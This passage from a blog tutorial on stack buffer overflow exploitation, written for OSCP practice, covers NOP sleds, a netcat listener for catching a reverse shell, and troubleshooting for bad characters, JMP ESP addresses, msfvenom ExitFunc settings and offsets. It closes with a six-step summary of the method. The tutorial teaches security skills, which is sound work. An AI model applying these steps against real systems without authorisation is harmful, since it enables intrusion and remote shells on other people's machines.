breathing room. If your offset is slightly off, execution will "slide" down the NOPs until it hits the decoder.</p> <p>Set up a netcat listener:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>nc <span class="nt">-lvnp</span> 443 </code></pre> </div> <p>Run the exploit, and you should catch a shell.</p> <h2> Troubleshooting </h2> <p><strong>No shell but no crash:</strong></p> <ul> <li>Check your JMP ESP address doesn't contain bad characters</li> <li>Verify the address points to an executable region</li> </ul> <p><strong>Immediate crash:</strong></p> <ul> <li>Regenerate payload with ALL bad characters in the <code>-b</code> flag</li> <li>Double-check your bad character analysis</li> </ul> <p><strong>Shell dies immediately:</strong></p> <ul> <li>Use <code>ExitFunc=thread</code> in msfvenom</li> <li>Some payloads need <code>ExitFunc=process</code> depending on the target</li> </ul> <p><strong>Wrong offset:</strong></p> <ul> <li>Re-verify with pattern_create/pattern_offset</li> <li>EIP should show exactly <code>0x42424242</code> (four B's)</li> </ul> <h2> Reflections </h2> <p>I remember learning buffer overflows for the OSCP and being genuinely nervous about the assembly code. I even Googled "can I pass OSCP without doing buffer overflow?"</p> <p>But I just started working through practice machines. After four or five runs, I was hooked.</p> <p>The best advice for people struggling to start:</p> <blockquote> <p><strong>Just jump in and start working. Learn to sink or swim. You'll get it eventually.</strong></p> </blockquote> <h2> Wrap Up </h2> <p>Buffer overflow exploitation is one of those skills that seems intimidating until you've done it a few times. The process is methodical:</p> <ol> <li>Connect and fuzz</li> <li>Find the offset</li> <li>Control EIP</li> <li>Find bad characters</li> <li>Redirect execution</li> <li>Deliver shellcode</li> </ol> <p>Once you understand the pattern, you can apply it to any vanilla stack overflow.</p> <p>Now go break some things (legally).</p> <ul> <li><p>Have questions or suggestions? Drop a comment below or connect with me on:</p></li> <li><p><a href="https://biscottidiskette.github.io" rel="noopener noreferrer">https://biscottidiskette.github.io</a></p></li> <li><p><a href="https://github.com/biscottidiskette" rel="noopener noreferrer">https://github.com/biscottidiskette</a></p></li> </ul> python security exploitdev redteam